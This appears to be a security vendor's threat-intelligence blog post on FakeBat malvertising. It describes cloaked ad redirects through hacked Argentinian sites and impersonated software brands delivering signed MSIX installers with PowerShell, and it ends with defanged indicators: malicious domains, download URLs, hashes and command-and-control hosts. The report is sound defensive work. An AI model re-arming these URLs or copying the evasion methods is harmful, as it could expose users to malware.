One malware family we have been tracking on this blog is FakeBat. It is very unique in that the threat actor uses MSI installers packaged with heavily obfuscated PowerShell code. For weeks, the malvertiser helping to distribute this malware was abusing the same URL shortener services which may have made the attack somewhat predictable. We saw them experimenting with new redirectors and in particular leveraging legitimate websites to bypass security checks.

Another interesting aspect is the diversity of the latest campaigns. For a while, we saw the same software brands (Parsec, Freecad) being impersonated over and over again. With this latest wave of FakeBat malvertising, we are seeing many different brands being targeted.

All the incidents described in this blog have been reported to Google.

**New redirection chain**

During the past several weeks, FakeBat malvertising campaigns used two kinds of ad URLs. As observed in other malvertising campaigns, they were abusing URL/analytics shorteners which are ideal for cloaking. That practice enables a threat actor to use a ‘good’ or ‘bad’ destination URL based on their own defined parameters (time of day, IP address, user-agent, etc.).

The other type of redirect was using subdomains from expired and sitting _.com_ domains reassigned for malicious purposes. This is a common trick to give the illusion of credibility. However, in the most recent malvertising campaigns we see the threat actor abusing legitimate websites that appear to have been compromised.

It’s worth noting that the few examples we found were all Argentinian-based (.ar TLD):

Victims click on the ad which sends a request to those hacked sites. Because the request contains the Google referer, the threat actor is able to serve a conditional redirect to their own malicious site:

The full infection chain can be summarized in the web traffic image seen below:

**Several active brand impersonations**

There are currently several campaigns running including OneNote, Epic Games, Ginger and even the Braavos smart wallet application. A number of those malicious domains can be found on Russian-based hoster DataLine (78.24.180\[.\]93).

Each downloaded file is an MSIX installer signed with a valid digital certificate (Consoneai Ltd).

Once extracted, each installer contains more or less the same files with a particular PowerShell script:

When the installer is ran, this PowerShell script will execute and connect to the attacker’s command and control server. Victims of interest will be cataloged for further use. ThreatDown EDR detects the PowerShell execution and creates an alert:

**Conclusion**

FakeBat continues to be a threat to businesses via malicious ads for popular software downloads. The malware distributors are able to bypass Google’s security checks and redirect victims to deceiving websites.

It is as important to defend against the supporting infrastructure as the malware payloads. However, that is not always easy since legitimate websites may be used to defeat domain blocklists. As always, blocking ads at the source via system policies such as ThreatDown DNS Filter, remains one the most effective ways to stop malvertising attacks in their tracks.

**Indicators of Compromise**

**Hacked sites**

cecar\[.\]com\[.\]ar
estiloplus\[.\]tur\[.\]ar

**Decoy sites**

obs-software\[.\]cc
bandi-cam\[.\]cc
breavas\[.\]app
open-project\[.\]org
onenote-download\[.\]com
epicgames-store\[.\]org
blcnder\[.\]org

**Download URLs**

bezynet\[.\]com/OBS-Studio-30\[.\]0\[.\]2-Full-Installer-x64\[.\]msix
bezynet\[.\]com/Bandicam\_7\[.\]21\_win64\[.\]msix
church-notes\[.\]com/Braavos-Wallet\[.\]msix
church-notes\[.\]com/Epic-Games\_Setup\[.\]msix
church-notes\[.\]com/Onenote\_setup\[.\]msix

**File hashes**

07b0c5e7d77629d050d256fa270d21a152b6ef8409f08ecc47899253aff78029  
0d906e43ddf453fd55c56ccd6132363ef4d66e809d5d8a38edea7622482c1a7a  
15ce7b4e6decad4b78fe6727d97692a8f5fd13d808da18cb9d4ce51801498ad8  
40c9b735d720eeb83c85aae8afe0cc136dd4a4ce770022a221f85164a5ff14e5  
f7fbf33708b385d27469d925ca1b6c93b2c2ef680bc4096657a1f9a30e4b5d18

**Command and control servers**

ads-pill\[.\]xyz  
ads-pill\[.\]top  
ads-tooth\[.\]top  
ads-analyze\[.\]top

Tag

#web